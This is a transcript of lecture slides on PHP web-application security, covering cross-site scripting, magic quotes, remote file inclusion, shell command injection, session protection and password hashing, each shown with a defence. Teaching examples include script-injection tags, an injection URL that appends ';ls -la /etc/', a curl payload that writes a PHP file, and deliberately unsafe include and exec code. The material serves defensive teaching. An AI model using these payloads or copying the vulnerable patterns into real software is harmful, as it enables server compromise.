security issues. general considerations security is a hot topic security is a hot topic security...
Post on 21-Dec-2015
215 views
TRANSCRIPT
Security IssuesSecurity Issues
General ConsiderationsGeneral Considerations
Security is a hot topicSecurity is a hot topic Security discussions are full of Security discussions are full of jargonjargon Zero Day ExploitZero Day Exploit Pen testingPen testing HackerHacker PharmingPharming InjectionInjection malwaremalware DOSDOS
Serious issue, but lots of FUDSerious issue, but lots of FUD
Start by Start by thinking about thinking about where you are where you are
exposedexposed
FilesystemFilesystem
Multiuser systemsMultiuser systems PHP codes executes as the web server, PHP codes executes as the web server, with the web server's permissionswith the web server's permissions
This means any file that you write via This means any file that you write via PHP might be writable by other users PHP might be writable by other users (either via PHP or a CGI program)(either via PHP or a CGI program)
Any file that's readable by the web Any file that's readable by the web server is readable by others via the server is readable by others via the web server, even if the server won't web server, even if the server won't serve them to a browser directlyserve them to a browser directly
Often web pages are world readable Often web pages are world readable
FormsForms
You're also exposed whenever you You're also exposed whenever you request data from a userrequest data from a user A user may give you data you don't A user may give you data you don't expect or wantexpect or want
Depending on how your program handles Depending on how your program handles the data, this can have a variety of the data, this can have a variety of resultsresults
Your data on the server could be Your data on the server could be affectedaffected
Other users' browsers could be Other users' browsers could be affectedaffected
Other VectorsOther Vectors
This is an aside….This is an aside…. Services such as ssh and mysqlServices such as ssh and mysql
FirewallsFirewalls DMZ DMZ Bind to different ip addressesBind to different ip addresses
What you do from the serverWhat you do from the server Where the server is located--Where the server is located--physical security is keyphysical security is key
Consider where you want Consider where you want to put your security to put your security
measuresmeasures For example, in this class I'm For example, in this class I'm trusting you all a lot, as a group, trusting you all a lot, as a group, not to trash machinesnot to trash machines
In MySQL, you can either use the In MySQL, you can either use the database to secure data, or PHP, or database to secure data, or PHP, or bothboth Both is hard to do…Both is hard to do…
In some cases, restricting access In some cases, restricting access to a domain is enough, in other ids to a domain is enough, in other ids are betterare better
BalanceBalance
Security is like a seesaw, with Security is like a seesaw, with whitehats and blackhats on the whitehats and blackhats on the endsends
What's the most secure OS?What's the most secure OS? Where is the threat coming from Where is the threat coming from these days?these days?
Categories of HacksCategories of Hacks
Data that is inserted into code Data that is inserted into code that is displayed on your pagesthat is displayed on your pages
Data that is inserted to alter Data that is inserted to alter your data your data
Holes that can be exploited to Holes that can be exploited to run arbitrary commandsrun arbitrary commands
Display HacksDisplay Hacks
Targets are bulletin boards, Targets are bulletin boards, blogs that allow comments, blogs that allow comments, wikis, web forums--anything that wikis, web forums--anything that allows users to input text that allows users to input text that will be displayedwill be displayed
At best, you might get random At best, you might get random stuff showing up on your web stuff showing up on your web pagespages
At worst, users could be At worst, users could be "captured" and whisked away"captured" and whisked away
Builtin SecurityBuiltin Security
PHP does try to protect us, but PHP does try to protect us, but sometimes that protection sometimes that protection causes it's own problemscauses it's own problems
I'm going to run through a I'm going to run through a series of examples, showing series of examples, showing some simple insertion some simple insertion techniques, and the approaches techniques, and the approaches to stop them to stop them
Magic QuotesMagic Quotes
An example of trying to do good in An example of trying to do good in a bad way….a bad way….
In the BeginningIn the Beginning
As PHP became more popular, attacks As PHP became more popular, attacks against it became more common (why against it became more common (why would this be the case?)would this be the case?)
Around PHP 3, it was in widespread Around PHP 3, it was in widespread use, but had very few security use, but had very few security features out of the boxfeatures out of the box
In particular, it did nothing to In particular, it did nothing to affect data input by formsaffect data input by forms
Version 4.2.3Version 4.2.3
To make PHP safer, version 4.2.3 To make PHP safer, version 4.2.3 included magic quotes enabled by included magic quotes enabled by defaultdefault
Magic quotes performs the same function Magic quotes performs the same function as add_slashes(), but only on any GET, as add_slashes(), but only on any GET, POST or cookie data--that is, it POST or cookie data--that is, it escapes any ',",\, or NULL characters, escapes any ',",\, or NULL characters, in an attempt to prevent folks from in an attempt to prevent folks from inserting command strings into phpinserting command strings into php
It works ok, for what it's trying to It works ok, for what it's trying to do, but isn't a complete solution…do, but isn't a complete solution…
So how does it work?So how does it work?
Magic quotes will try to protect Magic quotes will try to protect us a bit if someone inserts us a bit if someone inserts something like:something like:
<b>Alert!</b><p>Your account has <b>Alert!</b><p>Your account has been compromised, please <a been compromised, please <a href="http://www.cs.unc.edu">clihref="http://www.cs.unc.edu">click here for further ck here for further information</a></p>information</a></p>
echo_string_noslash.phpecho_string_noslash.php
This file defeats magic quotes and This file defeats magic quotes and echoes the $_GET["string"] var without echoes the $_GET["string"] var without alterationalteration
<b>Alert!</b><p>Your account has been <b>Alert!</b><p>Your account has been compromised, please compromised, please <a href="http://www.cs.unc.edu">click here <a href="http://www.cs.unc.edu">click here for further information</a></p>for further information</a></p>
Calgon, take me awayCalgon, take me away
One can also insert code that One can also insert code that moves the user from your site:moves the user from your site:
<script type=text/javascript>window.location = "http://www.duke.edu";</script>
With magic quotesWith magic quotes
echo_string.php doesn't defeat echo_string.php doesn't defeat magic quotesmagic quotes
<b>Alert!</b><p>Your account has been compromised, please <a href=http://www.cs.unc.edu>click here for further information</a></p>
Can't trust browsers Can't trust browsers anyhowanyhow
So with magic quotes if the hacker uses well formed HTML, we're okSo with magic quotes if the hacker uses well formed HTML, we're ok But what if I put this in:But what if I put this in:
Or this:Or this:<img src=http://cutedeadthings.com/images/skull-pink-tm.png><img src=http://cutedeadthings.com/images/skull-pink-tm.png>
The browser is trying to be helpful…The browser is trying to be helpful… Look at the sourceLook at the source
We don't need no quotesWe don't need no quotes
Even worse, we don't need quotes to Even worse, we don't need quotes to call for an external javascriptcall for an external javascript
This means we can insert pretty This means we can insert pretty much anything we want into the much anything we want into the page:page:
<script <script src=http://127.0.0.1/INLS672/samplesrc=http://127.0.0.1/INLS672/samples/php/security/javascript_hack.js><s/php/security/javascript_hack.js></script>/script>
This last exampleThis last example Cross site scripting (XSS) generally Cross site scripting (XSS) generally involves getting data into a web form involves getting data into a web form that produces HTML for display, and that produces HTML for display, and use that to call an external script use that to call an external script to perform a malicious actionto perform a malicious action
This is often done with javascript, This is often done with javascript, but can be done with other languagesbut can be done with other languages
Older versions of IE were prone to Older versions of IE were prone to attack in this manner because of attack in this manner because of ActiveXActiveX
Are Magic Quotes AGT?Are Magic Quotes AGT? Some say that magic quotes are badSome say that magic quotes are bad
when enabled, it can make it more difficult when enabled, it can make it more difficult to get the data you the way you want itto get the data you the way you want it
Produces a false sense of security, since Produces a false sense of security, since programmers should check user data anywayprogrammers should check user data anyway
But it does protect against the most common But it does protect against the most common attacks such as insertion of javascriptattacks such as insertion of javascript
But folks hated it enough that it's off in But folks hated it enough that it's off in PHP 6PHP 6
And that's the worst of it--if you want to And that's the worst of it--if you want to write portable code, you have to check for itwrite portable code, you have to check for it
Detecting and Detecting and Defeating Magic QuotesDefeating Magic Quotes
This is not very efficientThis is not very efficient<?phpif (get_magic_quotes_gpc()) { function stripslashes_deep($value) { $value = is_array($value) ? array_map('stripslashes_deep', $value) : stripslashes($value);
return $value; }
$_POST = array_map('stripslashes_deep', $_POST); $_GET = array_map('stripslashes_deep', $_GET); $_COOKIE = array_map('stripslashes_deep', $_COOKIE); $_REQUEST = array_map('stripslashes_deep', $_REQUEST);}?>
from http://us.php.net/manual/en/function.stripslashes.php
It's up to youIt's up to you
For many samples of XSS For many samples of XSS attacks, see:attacks, see:http://ha.ckers.org/xss.htmlhttp://ha.ckers.org/xss.html
Simple SanitationSimple Sanitation
In this case, we're going to In this case, we're going to use htmlentities(), use htmlentities(), htmlspecialchars() and htmlspecialchars() and strip_tabs() to affect the strip_tabs() to affect the user's inputuser's input
see echo_string_checks.htmlsee echo_string_checks.html Be aware that this is mainly a Be aware that this is mainly a browser protection…browser protection…
Blacklist vs. WhitelistBlacklist vs. Whitelist
What we've looked at so far are What we've looked at so far are examples of blacklisting--examples of blacklisting--trying to spot evil inputtrying to spot evil input
Whitelisting is more secure--Whitelisting is more secure--figure out what you want, and figure out what you want, and only allow thatonly allow that
Using regexUsing regex
Decide what you're willing to acceptDecide what you're willing to accept Check the user input for that Check the user input for that
if (eregi("^[a-zA-Z0-9]{0,}$", $_GET['string'])) // The regex above checks every char starting with 0 { echo "String is: " . $_GET['string']; }else { echo "<p>Illegal characters detected</p>"; }
echo_string_clean.htmlecho_string_clean.html
This is the same form, but passes This is the same form, but passes data to a php script with the data to a php script with the regex coderegex code
This approach has advantagesThis approach has advantages FutureproofFutureproof Doesn't require you guess what the Doesn't require you guess what the hacker might tryhacker might try
On error, doesn't process the data at On error, doesn't process the data at allall
Downside is it's harder to get Downside is it's harder to get data throughdata through
Arbitrary CommandsArbitrary Commands
Basically, this is the worst kind of Basically, this is the worst kind of attackattack
Cracker finds a hole that allows a Cracker finds a hole that allows a command to be executedcommand to be executed
Most often that happens at the Most often that happens at the privilege level of the web serverprivilege level of the web server
In some cases, it can be an elevated In some cases, it can be an elevated privilege (rare on linux, not so privilege (rare on linux, not so rare on windows under pre-vista rare on windows under pre-vista installations)installations)
Includes and RequiresIncludes and Requires It's pretty common to use an include or It's pretty common to use an include or require to pull files into a core scriptrequire to pull files into a core script
This is a potential vector for a XSS attack, This is a potential vector for a XSS attack, since PHP doesn't care if the file included since PHP doesn't care if the file included is remote or localis remote or local
Be careful with these--if you pass file to be Be careful with these--if you pass file to be included into your script with a GET or POST, included into your script with a GET or POST, a hacker can run a script of their own a hacker can run a script of their own through yoursthrough yours
magic_quotes do not protect against thismagic_quotes do not protect against this It's one of the ways I've been hackedIt's one of the ways I've been hacked
include $_GET['file'];
How I've Been HackedHow I've Been Hacked I created a simple PHP file that included I created a simple PHP file that included other files with a GET referenceother files with a GET reference
This allowed me to call files elsewhere on This allowed me to call files elsewhere on the server inside my frame program, and the server inside my frame program, and control the display if the file were a text control the display if the file were a text file or htmlfile or html
I did not check the data being passedI did not check the data being passed The hacker passed a reference to a file on The hacker passed a reference to a file on their system, that ran a perl script their system, that ran a perl script creating an email relay on our web server, creating an email relay on our web server, and then passed email through the web server and then passed email through the web server to our smtp server, which accepted all of to our smtp server, which accepted all of the spam, since it came from within the spam, since it came from within cs.unc.educs.unc.edu
The FileThe File
http://wwwx.cs.unc.edu/help/nethttp://wwwx.cs.unc.edu/help/network/frame.phpwork/frame.php??
The problem line was:The problem line was:include($_GET[name]);include($_GET[name]);
The FixThe Fix
Changed include() to Changed include() to readfile(), the latter doesn't readfile(), the latter doesn't process code, just reads it to process code, just reads it to outputoutput
Added a check for "//" for Added a check for "//" for remote access urlsremote access urls
Added a hook to send email to Added a hook to send email to me when tappedme when tapped
Attacking the serverAttacking the server
Since PHP can pull data about the Since PHP can pull data about the server, it can be used to find out server, it can be used to find out about the server's configuration about the server's configuration (esp. the web server)(esp. the web server)
More dangerous is the ability to More dangerous is the ability to access the shell You should be access the shell You should be careful with any data that will be careful with any data that will be passed to a shell script with back passed to a shell script with back ticks, exec(), or shellexec()ticks, exec(), or shellexec()
Unguarded GET or POSTUnguarded GET or POST In this case, the In this case, the GET variable is GET variable is passed directly passed directly into a shell execinto a shell exec
We know that We know that shell script shell script lines terminated lines terminated in a ";"in a ";"
So a command can So a command can be passed in the be passed in the variable, by variable, by inserting a semi-inserting a semi-coloncolonThis example from http://www.sitepoint.com/article/php-security-blunders
$month = $_GET['month'];$year = $_GET['year'];
exec("cal $month $year", $result);print "<PRE>";foreach ($result as $r) { print "$r<BR>"; }print "</PRE>";
Unguarded GET or POSTUnguarded GET or POST
An example of a get URL:An example of a get URL: http://127.0.0.1/php/security/unguahttp://127.0.0.1/php/security/unguarded_get.rded_get.phpphp?month=9;?month=9;ls ls -la /etc/-la /etc/
This would be passed to the web This would be passed to the web server, and executed with it's server, and executed with it's permissions, so it's a better permissions, so it's a better vector for reads than writesvector for reads than writes
But any directory that the web But any directory that the web server could write to could be server could write to could be tapped….tapped….This example from http://www.sitepoint.com/article/php-security-blunders
Unguarded GET or POSTUnguarded GET or POST
Ok, so let's say this file sits Ok, so let's say this file sits in a directory that the web in a directory that the web server can write to (say for a server can write to (say for a user comment file, or a log, user comment file, or a log, or….)or….)
Then a hacker could pass Then a hacker could pass something more malicious, eg:something more malicious, eg:curl http://www.cs.unc.edu -o curl http://www.cs.unc.edu -o myfile.phpmyfile.php
Unguarded GET or POSTUnguarded GET or POST
The author The author recommends recommends using a using a regular regular expression to expression to check that the check that the input is input is solely solely numbers, and numbers, and of the correct of the correct lengthlengthThis example from http://www.sitepoint.com/article/php-security-blunders
$month = $_GET['month'];$year = $_GET['year'];
if (!preg_match("/^[0-9]{1,2}$/", $month)) { die("Bad month, please re-enter."); }if (!preg_match("/^[0-9]{4}$/", $year)) { die("Bad year, please re-enter."); }
06_mysql_submit.php06_mysql_submit.php
I'm pretty much a failure hacking MySQL I'm pretty much a failure hacking MySQL so far…so far…
But using the lab as an example, here But using the lab as an example, here are some things you can insert into the are some things you can insert into the dbdb <a href=\"http://www.cs.unc.edu\"><a href=\"http://www.cs.unc.edu\">Wonk</a>Wonk</a>
<img src=/PoweredByMacOSXLarge.gif><img src=/PoweredByMacOSXLarge.gif> It's restricted by the number of It's restricted by the number of characters allowed in the field, but you characters allowed in the field, but you get the ideaget the idea
Additional Additional Considerations for Considerations for
MySQLMySQL Don't use unrestricted Don't use unrestricted privileges for database privileges for database connections (do as I say, not as connections (do as I say, not as I do)I do) Either have the user supply a user Either have the user supply a user id and password, or use a id and password, or use a restricted accountrestricted account
Use a mysql account that is limited Use a mysql account that is limited and appropriate for the given taskand appropriate for the given task
General Server General Server SettingsSettings
register_globalsregister_globals register_globals, when on, allows php register_globals, when on, allows php full access to all variables directlyfull access to all variables directly
In my examples, I've accessed GET and In my examples, I've accessed GET and POST data via the server global array POST data via the server global array even when not necessaryeven when not necessary
With it on, $_GET["variable"] is the With it on, $_GET["variable"] is the same as $variable in phpsame as $variable in php
This gives a hacker a chance to This gives a hacker a chance to inject data into unprotected inject data into unprotected variables into your script, say into variables into your script, say into a session variablea session variable
So check to see that it's off So check to see that it's off
open_base_diropen_base_dir The default is to allow php to open any The default is to allow php to open any files, this setting can be enabled to files, this setting can be enabled to restrict what directories php can restrict what directories php can accessaccess
With a setting of ".", the tree is With a setting of ".", the tree is restricted to the folder of the script restricted to the folder of the script itself, or loweritself, or lower
Can be set for virtual servers in Can be set for virtual servers in apacheapache
Keep in mind that this setting only Keep in mind that this setting only affects php, any shell scripts you use affects php, any shell scripts you use have full run of the directory treehave full run of the directory tree
What can you do?What can you do?
(Panic?)(Panic?)
Protect your codeProtect your code
In the class pages, I've made the source In the class pages, I've made the source code visible over the webcode visible over the web This is something to avoid in general--it's This is something to avoid in general--it's easier to hack a site if you know the sourceeasier to hack a site if you know the source
Hide configuration files and dataHide configuration files and data Restrictive .htaccess filesRestrictive .htaccess files Use cron based shell scripts to whisk Use cron based shell scripts to whisk data awaydata away
Keep data and config files separate from Keep data and config files separate from scriptsscripts
Use a sealed db serverUse a sealed db server
Hiding filesHiding files
Files with a "." as the first Files with a "." as the first character are readable by PHP, but character are readable by PHP, but won't be served by a web serverwon't be served by a web server
Depending on the server Depending on the server configuration (such a the web configuration (such a the web server's FollowSymLinks setting, or server's FollowSymLinks setting, or PHP's open_base_dir setting), you PHP's open_base_dir setting), you may be able to store data files in may be able to store data files in areas that the web server won't areas that the web server won't serve upserve up
.htaccess files.htaccess files
Disallow directory listingsDisallow directory listings You can also use a blank index You can also use a blank index filefile
Restrict access by user id or Restrict access by user id or by domainby domain
See See http://www.htaccessbasics.com/http://www.htaccessbasics.com/
Directory StructuresDirectory Structures
Keep data files in one directory, Keep data files in one directory, configuration files in another, and configuration files in another, and scripts in a thirdscripts in a third
You may need to put the data and You may need to put the data and config dirs inside the scripts config dirs inside the scripts folder, but you can use folder, but you can use an .htaccess file or other methods an .htaccess file or other methods to control accessto control access
For example, write permissions or For example, write permissions or afs aclsafs acls
Open versus Sealed Open versus Sealed serversservers
Be aware of who else is on your Be aware of who else is on your serverserver
Remember that the web server has Remember that the web server has to have read privileges--if I'm to have read privileges--if I'm on the same server, I might be on the same server, I might be able to use a cgi to see your able to use a cgi to see your source codesource code
Consider a "sealed" server for Consider a "sealed" server for critical datacritical data
Finding HacksFinding Hacks
Run a hash on your scripts to Run a hash on your scripts to check for mods--there are lots check for mods--there are lots of freebie programs that can do of freebie programs that can do this for you and alert you to this for you and alert you to changeschanges
Tripwire is one example, but Tripwire is one example, but it's a complicated thingit's a complicated thing
WatcherWatcher
Keep Cookies in the jarKeep Cookies in the jar
PHP sessions PHP sessions can store can store data in data in cookies as cookies as well as well as server server side--best side--best not to do not to do this unless this unless the data's the data's not not sensitivesensitive
QuickTime™ and a decompressor
are needed to see this picture.
Keep Cookies in the jarKeep Cookies in the jar
Some browsers (ie for example) Some browsers (ie for example) have historically been prone to have historically been prone to cookie theftcookie theft
So if you store sensitive data So if you store sensitive data in a cookie, salt and encrypt in a cookie, salt and encrypt it (hash is always better with it (hash is always better with salt anyway)salt anyway)
Control Session DataControl Session Data
In the examples for class, I've In the examples for class, I've used a session to store data used a session to store data across formsacross forms
Session data is usually in /tmp Session data is usually in /tmp or /var/tmpor /var/tmp
Since the web server can read Since the web server can read these, so can any else on the these, so can any else on the server who can write web scriptsserver who can write web scripts
Protecting Session DataProtecting Session Data
To reduce the chance of To reduce the chance of hijacking, use a combination of hijacking, use a combination of data--for example, check not data--for example, check not only the session key, but also only the session key, but also the ip number (consider storing the ip number (consider storing that in post data or a text that in post data or a text file)file)
Encrypt any sensitive data Encrypt any sensitive data stored in the sessionstored in the session
cookie_monster.phpcookie_monster.php
Better StillBetter Still
Generate a random key on each Generate a random key on each page loadpage load
Check other data, such as the Check other data, such as the client ip number or browser client ip number or browser version and track that as well version and track that as well
Store data in multiple places and Store data in multiple places and compare (eg. some data in the compare (eg. some data in the session, some in a cookie, and session, some in a cookie, and even some in a database or file)even some in a database or file)
Hash is good for youHash is good for you
I've mentioned this a few I've mentioned this a few times, but you can use hashes times, but you can use hashes of data as a security measure, of data as a security measure, esp. for passwordsesp. for passwords
What is hash really?What is hash really?
createLogincreateLogin
This is some code I used for a This is some code I used for a faculty application sitefaculty application site
Users created a login with Users created a login with their email address as an idtheir email address as an id
Passwords stored in a text Passwords stored in a text file, as an MD5 hashfile, as an MD5 hash
create_login.php create_login.php
This is a simple php script that This is a simple php script that calls some HTML into itself, and calls some HTML into itself, and uses a jah like function to test uses a jah like function to test the data submitted by the user--the data submitted by the user--this check has a php backend, so this check has a php backend, so the javascript check and the the javascript check and the subsequent php check are the samesubsequent php check are the same
All it does for the password is All it does for the password is run it through md5run it through md5
$new_entry[id] = trim($_POST["get_id"]); $new_entry[passwd] = md5(trim($_POST["get_passwd"])); $new_entry[key] = $_SESSION['session_key']; $new_entry[created] = $runtime; $new_entry[status] = "new"; write_data_file($new_entry, $id_data);
create_login.php create_login.php
As the form is submitted to itself, As the form is submitted to itself, after some checks, the post data is after some checks, the post data is shoved into an array, and written to shoved into an array, and written to a filea file
The hash would be better with a saltThe hash would be better with a salt
submit_application.phpsubmit_application.php
After the id is created, or After the id is created, or when a user returns, they land when a user returns, they land on submit_application.phpon submit_application.php
This asks them for the userid This asks them for the userid and password on the first passand password on the first pass
On the second pass, it checks On the second pass, it checks the userid and data in the postthe userid and data in the post
$ids_file = read_data_file("./config/userids.txt"); $test= md5_match_array_element($ids_file, "id", $_POST["id"], "passwd", $_POST["passwd"]); if ($test > 0) { $action="submit_application: login_failure"; require './logger.php'; // call the program to write out log entries. die_cleanly("<div id=\"notice\"><p>Invalid User ID or password, if you feel you have received this message in error please contact <a href=\"http://www.cs.unc.edu/cgi-bin/mailcs?hays\"> bil hays</a></p></div>"); }
submit_application.phpsubmit_application.php Notice md5_match_array_element()Notice md5_match_array_element()
md5_match_array_elementmd5_match_array_element()()
function md5_match_array_element($array, $array_key, function md5_match_array_element($array, $array_key, $get_key, $array_element, $get_element)$get_key, $array_element, $get_element) {{ foreach ($array as $i)foreach ($array as $i) {{ if ($i[$array_key] == $get_key)if ($i[$array_key] == $get_key) {{ if ($i[$array_element] != md5($get_element))if ($i[$array_element] != md5($get_element)) { { return "1";return "1"; }} return "0";return "0"; }} }} return "2";return "2"; }}
Use of hashesUse of hashes
A hash can be used to check a A hash can be used to check a value presented against a prior value presented against a prior valuevalue
Or to detect file changes--if Or to detect file changes--if you write a big chunk of code, you write a big chunk of code, you can run a hash on the files you can run a hash on the files or the tarball. When you check or the tarball. When you check the files against the hash, you the files against the hash, you can detect a changecan detect a change
Final pointsFinal points
Keep Up To DateKeep Up To Date
Update your PHP installation Update your PHP installation regularly, and check the php.ini regularly, and check the php.ini settings when you dosettings when you do
Create Create andand check log files in your check log files in your php programs (consider automating php programs (consider automating this with a cron)this with a cron)
Read--there are web sites and Read--there are web sites and discussion lists that cover these discussion lists that cover these issues--many are a bit histrionic, issues--many are a bit histrionic, but you get good ideas anywaybut you get good ideas anyway
http:http://nexodyne//nexodyne.com/.com/ http://www.codehelp.co.uk/php/http://www.codehelp.co.uk/php/taint.phptaint.php